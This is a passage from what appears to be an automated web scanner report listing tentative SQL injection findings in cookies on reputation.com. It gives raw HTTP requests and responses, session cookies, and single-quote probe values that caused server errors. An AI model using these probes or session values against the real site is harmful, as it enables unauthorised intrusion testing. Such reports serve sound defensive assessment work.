Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=84D716E1; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D458%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A8%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A8%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A8; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.56.8.1303178441001; uuid=4daceca02633e; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 19 Apr 2011 02:07:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:07:57 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 111585
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.22. http://www.reputation.com/myprivacy [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /myprivacy

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /myprivacy HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /myprivacy HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:51:48 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:51:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 122639
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.2087011337280
...[SNIP]...

1.23. http://www.reputation.com/services/panelrenderer.php [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /services/panelrenderer.php

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=0&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:07:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=0&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:07:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:07:50 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 113400
Content-Type: text/html; charset=UTF-8

<input type="hidden" id="_isCartEmpty" value=""/>
<div id="purchaseTop" class="left">
<div id="shoppingCartTable">

<div class="entityNameBar"><h2 class
...[SNIP]...

1.24. https://www.reputation.com/products [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /products

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /products HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; repdef_ref_code=RCPT2; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; shoppingCart=cr9mtt4r59r253pvqk5sko5292; abg_products/default6_d=products%2Fdefault6_e

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /products HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; repdef_ref_code=RCPT2; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; shoppingCart=cr9mtt4r59r253pvqk5sko5292; abg_products/default6_d=products%2Fdefault6_e

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:51:50 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:51:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 145704
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.1298601627349
...[SNIP]...

1.25. https://www.reputation.com/secure/forgotPassword [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/forgotPassword

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/forgotPassword HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: https://www.reputation.com/secure/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/forgotPassword HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: https://www.reputation.com/secure/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 23649
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.26. https://www.reputation.com/secure/login [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/login

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:50:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:50:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 26434
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.27. https://www.reputation.com/secure/login [repdef_ref_code cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/login

Issue detail

The repdef_ref_code cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the repdef_ref_code cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2'

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:53:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2''

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:53:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 26434
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.28. https://www.reputation.com/secure/reg1 [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/reg1

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/reg1 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?bundleAdded=1891
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
